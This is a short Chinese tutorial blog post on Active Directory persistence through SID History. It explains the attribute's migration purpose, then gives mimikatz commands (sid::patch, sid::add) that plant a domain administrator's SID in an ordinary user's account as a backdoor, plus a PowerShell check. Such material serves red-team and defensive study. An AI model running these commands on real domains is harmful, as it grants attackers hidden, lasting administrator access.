域权限维持-SID History

一、SID

每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。

 

二、SID History

SID History是在域迁移过程中需要使用的一个属性。

如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。

SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。

使用mimikatz,可以将SID History属性添加到域中任意用户的SID History属性中。在实战中,如果获得了域管理员权限,则可以将SID History作为实现持久化的方法。

 

三、mimikatz添加SID History后门

1、打开一个具有域管理员权限的命令行窗口,然后打开mimikatz,将administrator的SID添加到hack用户的SID History属性中。

需要注意的是,在使用mimikatz注入SID之前,需要使用 sid::patch 命令修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性;mimikatz在2.1版本后,将 misc:addsid 模块添加到了 sid:add 模块下。

privilege::debug
sid::patch
sid::add /sam:hack /new:administrator     #将administrator的SID添加到hack的SID History属性中

 

2、使用PowerShell查看test用户的SID History

Import-Module activedirectory
Get-ADUser hack -Properties sidhistory

 

3、使用域用户hack登录系统,测试其是否具有administrator用户的权限,这里尝试列出域控的C盘。

 

 

posted @ 2020-08-20 16:34  xiaoxiaosen  阅读(203)  评论(0编辑  收藏